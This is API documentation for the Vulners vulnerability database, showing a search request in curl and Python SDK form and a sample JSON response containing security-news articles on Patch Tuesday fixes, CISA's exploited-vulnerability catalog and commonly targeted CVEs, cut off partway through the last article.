Skip to content

Vulners API Methods

Introduction

This documentation offers a clear guide for developers on how to use the Vulners API. It includes essential API methods for interacting with the Vulners database, such as retrieving OS vulnerabilities, managing collections, utilizing webhooks, and more. Each method is presented with its SDK equivalent (where applicable), CURL commands, required parameters, and expected responses. This guide aims to assist developers in efficiently integrating Vulners' extensive cybersecurity data into their applications and systems.

Additionally, it's important for developers to note that each CURL command within the documentation can include both required and optional parameters to tailor the API request. There is also a "fields" parameter available for specifying which data fields should be returned in the response, allowing for customization based on the developer's needs. For those utilizing the Python SDK, the default fields set for responses are as follows:

  • id
  • title
  • description
  • type
  • bulletinFamily
  • cvss
  • published
  • modified
  • lastseen
  • href
  • sourceHref
  • sourceData
  • cvelist

This predefined set ensures that the most relevant information is readily available, while also providing the option to customize the output further by specifying different fields if necessary.

Basics

Search in database

The database search feature is similar to the search on the Vulners website.

Required parameters:

  • query (str): Search query by Lucene syntax
  • skip (int)
  • size (int): count of output elements
  • apiKey: Activated API key

Query:

POST /api/v3/search/lucene/

Query example:

curl -XPOST https://vulners.com/api/v3/search/lucene -H 'Content-Type: application/json' -d '{
"query": "Fortinet AND RCE order:published", 
"skip": 0, 
"size": 5, 
"fields": [
    "id", 
    "published", 
    "description", 
    "type", 
    "title", 
    "cvelist"], 
"apiKey": "{API key}"
}'

database_search_1 = vulners_api.find_all(
    "Fortinet AND RCE order:published", limit=5,  fields=["published", "title", "description", "cvelist"])`
[
    {
        "cvelist": [
            "CVE-2024-20674",
            "CVE-2024-20677",
            "CVE-2024-20700"
        ],
        "description": "Microsoft has issued patches for 48 security vulnerabilities in the first Patch Tuesday of 2024. With a relatively low number of patches\u2014and only two of them critical\u2014this makes it a relatively quiet month, which is certainly not the norm in January.\n\nThe Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE IDs for the two critical vulnerabilities are:\n\n[CVE-2024-20674](<https://vulners.com/cve/CVE-2024-20674>) is a Windows Kerberos security feature bypass vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 9.0 out of 10. An authenticated attacker could exploit this vulnerability by establishing a [machine-in-the-middle (MITM)](<https://www.malwarebytes.com/glossary/man-in-the-middle-mitm>) attack or other local network spoofing technique, then sending a malicious Kerberos message to the client victim machine to spoof itself as the Kerberos authentication server.\n\nKerberos is an authentication protocol that is used to verify the identity of a user or host. To make use of this vulnerability the attacker will need to gain access to the restricted network before being able to run an attack. Nevertheless Microsoft thinks exploitation is \u201cmore likely,\u201d which means the vulnerability could be exploited as part of an attack chain.\n\n[CVE-2024-20700](<https://vulners.com/cve/CVE-2024-20700>) is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 7.5 out of 10. Successful exploitation of this vulnerability might be hard because it requires an attacker to win a race condition and they will need to first gain access to the restricted network before running an attack.\n\nHyper-V is the Windows hardware virtualization service. It enables users to create and run a software version of a computer, called a [virtual machine](<https://www.malwarebytes.com/glossary/virtual-machine>). Sometimes these virtual machines are attractive targets for cybercriminals. But the advisory is not very clear on the exact circumstances or context that would allow the RCE.\n\nOne other vulnerability, classified as important, that might turn out to be of interest, at least for some users, is:\n\n[CVE-2024-20677](<https://vulners.com/cve/CVE-2024-20677>) is a Microsoft Office Remote Code Execution (RCE) vulnerability with a CVSS score of 7.8 out of 10. The security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365.\n\nFBX files are a type of 3D model file created using the Autodesk FBX software. When you try to insert an FBX file into Word, Excel, PowerPoint, and Outlook, you will see the following error: \u201cAn error occurred while importing this file.\u201d If you\u2019d like to re-enable this ability, you can find the reasons why you shouldn\u2019t and the method how to do it on this [Microsoft Support page](<https://support.microsoft.com/en-au/topic/support-for-fbx-files-has-been-turned-off-in-office-9f2387f1-84ec-496a-a288-2c6f774db219>).\n\n### Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.\n\n  * Adobe [released a patch](<https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html>) addressing six CVEs in Substance 3D Stager.\n  * Google published the [Android Security Bulletin for January 2024](<https://source.android.com/docs/security/bulletin/2024-01-01>).\n  * Fortinet has [released a security update](<https://www.fortiguard.com/psirt/FG-IR-23-315>) to address a vulnerability in FortiOS and FortiProxy software.\n  * SAP has released its [January 2024 Patch Day](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) updates.\n\n* * *\n\n**We don\u2019t just report on vulnerabilities\u2014we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using [ThreatDown Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).",
        "published": "2024-01-10T18:07:38",
        "type": "malwarebytes",
        "title": "Patch now! First patch Tuesday of 2024 is here"
    },
    {
        "cvelist": [
            "CVE-2022-3236",
            "CVE-2023-21751",
            "CVE-2023-35628",
            "CVE-2023-35630",
            "CVE-2023-35636",
            "CVE-2023-35638",
            "CVE-2023-35639",
            "CVE-2023-35641",
            "CVE-2023-35642",
            "CVE-2023-35643",
            "CVE-2023-36012",
            "CVE-2023-36019"
        ],
        "description": "[![Microsoft](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitNgqCUKiZvap6tAh5CSF1qXS_qapv34Of7TuQ3FMuN7seycUe7Z0tblPbfbeap94-KacqYaL3ILXkD6PnKrR93fbdrEUktLtB7b8P2OBMGf34Nf9GY2ZpYxLJGbimY5UBB6Gp5WsxRtERt2WF3T63g49hi3B8W4GPeKAT4csfIq7pnEFmv06755oLVkA_/s728-rw-ft-e30/windows.jpg>)\n\nMicrosoft released its final set of Patch Tuesday updates for 2023, closing out 34 flaws in its software, making it one of the lightest releases in recent years.\n\nOf the 34 shortcomings, four are rated Critical and 30 are rated Important in severity. The fixes are in addition to [18 flaws](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) Microsoft addressed in its Chromium-based Edge browser since the release of [Patch Tuesday updates for November 2023](<https://thehackernews.com/2023/11/alert-microsoft-releases-patch-updates.html>).\n\nAccording to data from the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2023/12/12/the-december-2023-security-update-review>), the software giant has patched more than 900 flaws this year, making it one of the busiest years for Microsoft patches. For comparison, Redmond [resolved 917 CVEs](<https://www.tenable.com/blog/microsoft-patch-tuesday-2023-year-in-review>) in 2022.\n\nWhile none of the vulnerabilities are listed as publicly known or under active attack at the time of release, some of the notable ones are listed below -\n\n  * [**CVE-2023-35628**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35628>) (CVSS score: 8.1) - Windows MSHTML Platform Remote Code Execution Vulnerability\n  * [**CVE-2023-35630**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35630>) (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability\n  * [**CVE-2023-35636**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636>) (CVSS score: 6.5) - Microsoft Outlook Information Disclosure Vulnerability\n  * [**CVE-2023-35639**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35639>) (CVSS score: 8.8) - Microsoft ODBC Driver Remote Code Execution Vulnerability\n  * [**CVE-2023-35641**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35641>) (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability\n  * [**CVE-2023-35642**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35642>) (CVSS score: 6.5) - Internet Connection Sharing (ICS) Denial-of-Service Vulnerability\n  * [**CVE-2023-36019**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36019>) (CVSS score: 9.6) - Microsoft Power Platform Connector Spoofing Vulnerability\n\nCVE-2023-36019 is also significant because it allows the attacker to send a specially crafted URL to the target, resulting in the execution of malicious scripts in the victim's browser on their machine.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/BHcgTukm> \"Cybersecurity\" )\n\n\"An attacker could manipulate a malicious link, application, or file to disguise it as a legitimate link or file to trick the victim,\" Microsoft said in an advisory.\n\nMicrosoft's Patch Tuesday update also plugs three flaws in the Dynamic Host Configuration Protocol (DHCP) server service that could lead to a denial-of-service or information disclosure -\n\n  * [**CVE-2023-35638**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35638>) (CVSS score: 7.5) - DHCP Server Service Denial-of-Service Vulnerability\n  * [**CVE-2023-35643**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35643>) (CVSS score: 7.5) - DHCP Server Service Information Disclosure Vulnerability\n  * [**CVE-2023-36012**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36012>) (CVSS score: 5.3) - DHCP Server Service Information Disclosure Vulnerability\n\nThe disclosure also comes as Akamai discovered a new set of attacks against Active Directory domains that use Microsoft Dynamic Host Configuration Protocol ([DHCP](<https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top>)) servers.\n\n\"These attacks could allow attackers to spoof sensitive DNS records, resulting in varying consequences from credential theft to full Active Directory domain compromise,\" Ori David [said](<https://www.akamai.com/blog/security-research/spoofing-dns-by-abusing-dhcp>) in a report last week. \"The attacks don't require any credentials, and work with the default configuration of [Microsoft DHCP server](<https://www.trustedsec.com/blog/injecting-rogue-dns-records-using-dhcp>).\"\n\nThe web infrastructure and security company further noted the impact of the flaws can be significant as they can be exploited to spoof DNS records on Microsoft DNS servers, including an unauthenticated arbitrary DNS record overwrite, thereby enabling an actor to gain a machine-in-the-middle position on hosts in the domain and access sensitive data.\n\nMicrosoft, in response to the findings, said the \"problems are either by design, or not severe enough to receive a fix,\" necessitating that users Disable DHCP DNS Dynamic Updates if not required and refrain from using DNSUpdateProxy.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/3UvK59NV> \"Cybersecurity\" )\n\n## Software Patches from Other Vendors\n\nOutside of Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including \u2014\n\n  * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n  * [Amazon Web Services](<https://aws.amazon.com/security/security-bulletins/>)\n  * [Android](<https://source.android.com/docs/security/bulletin/2023-12-01>)\n  * [Apache Projects](<https://projects.apache.org/releases.html>) (including [Apache Struts](<https://thehackernews.com/2023/12/new-critical-rce-vulnerability.html>))\n  * [Apple](<https://thehackernews.com/2023/12/apple-releases-security-updates-to.html>)\n  * [Arm](<https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities>)\n  * [Atlassian](<https://thehackernews.com/2023/12/atlassian-releases-critical-software.html>)\n  * [Atos](<https://unify.com/en/support/security-advisories>)\n  * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n  * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n  * [Dell](<https://www.dell.com/support/security/>)\n  * [Drupal](<https://www.drupal.org/security>)\n  * [F5](<https://my.f5.com/manage/s/new-updated-articles#sort=%40f5_updated_published_date%20descending&f:@f5_document_type=\\[Security%20Advisory\\]&periodFilter=0&dateField=1>)\n  * [Fortinet](<https://www.fortiguard.com/psirt>)\n  * [GitLab](<https://about.gitlab.com/releases/2023/11/30/security-release-gitlab-16-6-1-released/>)\n  * [Google Chrome](<https://chromereleases.googleblog.com/>)\n  * [Google Chromecast](<https://source.android.com/docs/security/bulletin/chromecast/2023-12-01>)\n  * [Google Cloud](<https://cloud.google.com/support/bulletins>)\n  * [Google Wear OS](<https://source.android.com/docs/security/bulletin/wear/2023/2023-12-01>)\n  * [Hikvision](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/>)\n  * [Hitachi Energy](<https://www.hitachienergy.com/in/en/products-and-solutions/cybersecurity/alerts-and-notifications>)\n  * [HP](<https://support.hp.com/us-en/security-bulletins>)\n  * [IBM](<https://www.ibm.com/support/pages/bulletin/>)\n  * [Jenkins](<https://www.jenkins.io/security/advisories/>)\n  * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n  * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n  * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/December-2023>) (including [5Ghoul](<https://thehackernews.com/2023/12/new-5g-modems-flaws-affect-ios-devices.html>))\n  * [Mitsubishi Electric](<https://www.mitsubishielectric.com/en/psirt/vulnerability/index.html>)\n  * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n  * [NETGEAR](<https://www.netgear.com/about/security/>)\n  * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n  * [Qualcomm](<https://thehackernews.com/2023/12/qualcomm-releases-details-on-chip.html>) (including [5Ghoul](<https://thehackernews.com/2023/12/new-5g-modems-flaws-affect-ios-devices.html>))\n  * [Samsung](<https://security.samsungmobile.com/securityUpdate.smsb>)\n  * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n  * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n  * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n  * [SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories>)\n  * [SonicWall](<https://www.sonicwall.com/search/#t=Support&sort=date%20descending&f:sourceTypeFacetId=\\[Notices\\]&f:@language=\\[English\\]>)\n  * [Sophos](<https://www.sophos.com/en-us/security-advisories>) (backports a fix for [CVE-2022-3236](<https://thehackernews.com/2022/09/hackers-actively-exploiting-new-sophos.html>) to unsupported versions of the Sophos Firewall)\n  * [Spring Framework](<https://spring.io/security>)\n  * [Veritas](<https://www.veritas.com/support/en_US/security/>)\n  * [VMware](<https://www.vmware.com/security/advisories.html>)\n  * [WordPress](<https://thehackernews.com/2023/12/wordpress-releases-update-642-to.html>)\n  * [Zoom](<https://explore.zoom.us/en/trust/security/security-bulletin/>), and\n  * [Zyxel](<https://thehackernews.com/2023/12/zyxel-releases-patches-to-fix-15-flaws.html>)\n\n_(The story was updated after publication to modify the number of flaws patched by Microsoft and take into account _[_CVE-2023-21751_](<https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-21751>)_. Microsoft released an advisory for the vulnerability a day after the release of Patch Tuesday updates.)_\n\n  \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
        "published": "2023-12-13T05:50:00",
        "type": "thn",
        "title": "Microsoft's Final 2023 Patch Tuesday: 34 Flaws Fixed, Including 4 Critical"
    },
    {
        "cvelist": [
            "CVE-2020-2551",
            "CVE-2023-1671",
            "CVE-2023-2551",
            "CVE-2023-34992",
            "CVE-2023-36553",
            "CVE-2023-36584",
            "CVE-2023-36884"
        ],
        "description": "[![Active Exploitation](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rDJj_oU45s5bhg6wX-OdktekVTvzeIJh62kVTkBLzgABhLluROoTkebmdE1plaGLH420QMUOaEYPhkIeQJw1gOjuJ7ftYRfoRVgTzPapHioBJtNsO-NuEyh812rT7OdU2IDTq2Q7UsvLjvXsSzr5DqyN9AqVFH8mkmSABiV_vvlAxAD7In4bXr4NJhrt/s728-rw-ft-e30/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added three security flaws to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog based on evidence of active exploitation in the wild.\n\nThe [vulnerabilities](<https://www.cisa.gov/news-events/alerts/2023/11/16/cisa-adds-three-known-exploited-vulnerabilities-catalog>) are as follows -\n\n  * [**CVE-2023-36584**](<https://nvd.nist.gov/vuln/detail/CVE-2023-36584>) (CVSS score: 5.4) - Microsoft Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability\n  * [**CVE-2023-1671**](<https://nvd.nist.gov/vuln/detail/CVE-2023-1671>) (CVSS score: 9.8) - Sophos Web Appliance Command Injection Vulnerability\n  * [**CVE-2020-2551**](<https://nvd.nist.gov/vuln/detail/CVE-2020-2551>) (CVSS score: 9.8) - Oracle Fusion Middleware Unspecified Vulnerability\n\nCVE-2023-1671 relates to a critical [pre-auth command injection vulnerability](<https://vulncheck.com/blog/cve-2023-1671-analysis>) that allows for the execution of arbitrary code. CVE-2020-2551 is a [flaw](<https://www.aon.com/cyber-solutions/aon_cyber_labs/cve-2020-2551-unauthenticated-rce-in-oracle-weblogic/>) in the WLS Core Components that allows an unauthenticated attacker with network access to compromise the WebLogic Server.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/4WnFxcNN> \"Cybersecurity\" )\n\nThere are currently no public reports documenting in-the-wild attacks leveraging CVE-2023-1671, but Cybernews [disclosed](<https://cybernews.com/security/harvard-university-remote-code-execution-attack/>) in July 2023 that it had identified a subdomain of the Harvard University \u2013 courses.my.harvard[.]edu \u2013 that was susceptible to CVE-2020-2551.\n\nOn the other hand, the addition of CVE-2023-36584 to the KEV catalog is based on a report from Palo Alto Networks Unit 42 earlier this week, which [detailed](<https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/>) spear-phishing attacks mounted by pro-Russian APT group known as Storm-0978 (aka RomCom or Void Rabisu) targeting groups supporting Ukraine's admission into NATO in July 2023.\n\nCVE-2023-36584, [patched](<https://thehackernews.com/2023/10/microsoft-releases-october-2023-patches.html>) by Microsoft as part of October 2023 security updates, is said to have been used alongside [CVE-2023-36884](<https://www.trellix.com/about/newsroom/stories/research/breaking-down-cve-2023-36884-and-the-infection-chain/>), a Windows remote code execution vulnerability [addressed](<https://thehackernews.com/2023/07/microsoft-releases-patches-for-130.html>) in July, in an exploit chain to deliver [PEAPOD](<https://thehackernews.com/2023/10/new-peapod-cyberattack-campaign.html>), an updated version of RomCom RAT.\n\nIn light of active exploitation, federal agencies are recommended to apply the fixes by December 7, 2023, to secure their networks against potential threats.\n\n## Fortinet Discloses Critical Command Injection Bug in FortiSIEM\n\nThe development comes as Fortinet is alerting customers of a critical command injection vulnerability in FortiSIEM report server ([CVE-2023-36553](<https://nvd.nist.gov/vuln/detail/CVE-2023-36553>), CVSS score: 9.3) that could be exploited by attackers to execute arbitrary commands.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/pjHvTZON> \"Cybersecurity\" )\n\nCVE-2023-36553 has been described as a variant of [CVE-2023-34992](<https://www.fortiguard.com/psirt/FG-IR-23-130>) (CVSS score: 9.7), a similar flaw in the same product that was remediated by Fortinet in early October 2023.\n\n\"An improper neutralization of special elements used in an OS command vulnerability [[CWE-78](<https://cwe.mitre.org/data/definitions/78.html>)] in FortiSIEM report server may allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests,\" the company [said](<https://www.fortiguard.com/psirt/FG-IR-23-135>) in an advisory this week.\n\nThe vulnerability, which impacts FortiSIEM versions 4.7, 4.9, 4.10, 5.0, 5.1, 5.2, 5.3, and 5.4, has been fixed in versions 7.1.0, 7.0.1, 6.7.6, 6.6.4, 6.5.2, 6.4.3, or later.\n\n### Update\n\nWhen reached for comment on the addition of CVE-2023-1671 to the KEV catalog, Sophos shared the following statement with The Hacker News -\n\n_More than six months ago, on April 4, 2023, we released an automatic patch to all Sophos Web Appliances, as noted in the _[_Security Advisory_](<https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce>)_ on our _[_Trust Center_](<https://www.sophos.com/en-us/trust>)_, and in July 2023, we\u2019ve phased out Sophos Web Appliance as previously planned. We appreciate CISA\u2019s notice for any of the small number of remaining Sophos Web Appliance users who turned off auto-patch and/or missed our ongoing updates, and recommend they upgrade to _[_Sophos Firewall_](<https://www.sophos.com/en-us/products/next-gen-firewall>)_ for optimal network security moving forward._\n\n_(The article was updated after publication to mention that the third security flaw added to the KEV catalog is CVE-2020-2551 and not CVE-2023-2551, which was erroneously referenced in the alert published by CISA.)_\n\n  \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
        "published": "2023-11-17T05:57:00",
        "type": "thn",
        "title": "CISA Adds Three Security Flaws with Active Exploitation to KEV Catalog"
    },
    {
        "cvelist": [
            "CVE-2012-0158",
            "CVE-2012-0507",
            "CVE-2012-1723",
            "CVE-2013-0074",
            "CVE-2014-6271",
            "CVE-2017-0143",
            "CVE-2017-0144",
            "CVE-2017-0145",
            "CVE-2017-0199",
            "CVE-2017-11882",
            "CVE-2017-8570",
            "CVE-2018-0802",
            "CVE-2018-13379",
            "CVE-2018-8174",
            "CVE-2019-11510",
            "CVE-2019-19781",
            "CVE-2019-2725",
            "CVE-2020-1472",
            "CVE-2021-26084",
            "CVE-2021-26855",
            "CVE-2021-31207",
            "CVE-2021-34473",
            "CVE-2021-34523",
            "CVE-2021-44228"
        ],
        "description": "The earlier blog posts showcased an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers._ _A quick recap \u2013 We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware &amp; ransomware.\n\nThis blog post will focus on **Qualys\u2019 Top Twenty Vulnerabilities, **targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.\n\nSome of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>)**,** published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>)**.**\n\nRead on- \n\n## Stats on the Top 20 Vulnerable Vendors &amp; By-Products\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-1.-Top-20-Vulnerable-Vendor-1070x694.png)**Fig 1. Top Vulnerable Vendor**\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-2.-Top-20-Vulnerable-Products-1070x708.png)**Fig 2. Top Vulnerable Products**\n\n## Top Twenty Most Targeted by Attackers\n\n### **1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**\n\nIt was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023. \n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\n**Qualys Vulnerability Detection (QID): 110308**\n\nDisclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office&#x27;s Equation Editor. It could enable an attacker to execute arbitrary code under the current user&#x27;s permissions. \n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. This vulnerability will be exploited if the user opens a specially crafted file, potentially sent via email or hosted on a compromised website.\n\nIt\u2019s been primarily exploited in various cyber-attacks and espionage campaigns.\n\n### 2\\. **CVE-2017-0199: Microsoft Wordpad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier.**\n\nCVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions precisely when they parse specially crafted files. This vulnerability is the most favored vulnerability by malware, threat actors, and ransomware. \n\nIf successfully exploited, an attacker could execute arbitrary code in the current user&#x27;s security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.\n\n### 3\\. **CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a substantial remote code execution vulnerability in Windows standard controls. An attacker can exploit the flaw by constructing a specially crafted webpage. Upon viewing this webpage, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware 11 Threat Actors and was trending in the wild as recently as September 2, 2023\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim&#x27;s machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.\n\n### 5\\. **CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the &quot;Additional Routinely Exploited Vulnerabilities in 2022&quot; list, published by CISA earlier. **\n\nCVE-2020-1472, or **Zerologon, is a severe vulnerability in Microsoft&#x27;s Netlogon Remote Protocol** due to a flawed implementation of AES-CFB8 encryption.\n\nUsing a fixed initialization vector and accepting unencrypted sessions allows an attacker to impersonate a server and compromise the entire Windows domain. The attacker takes control over all the Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability WannaCry, Petya**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID):  91361, 91360, 91359, 91345**\n\nCommonly known as Shadow Broker or MS17-010, or &quot;ETERNALBLUE,&quot; or &quot;ETERNALSYNERGY&quot; or &quot;ETERNAL ROMANCE&quot; is a remote code execution vulnerability in Microsoft&#x27;s Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerability arises from how SMBv1 handles specific requests, allowing an attacker(usually authenticated) to send a specially crafted packet to an SMBv1 server, enabling them to execute code on the target server.\n\nIt was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.\n\n### 7\\. **CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID):  120274**\n\nCVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page, hosting a rogue Java applet can be exploited through a malicious web page hosting rogue Java applet.\n\nThe issue, originating from a type-confusion error in the &quot;HotSpot&quot; component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user&#x27;s system\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection 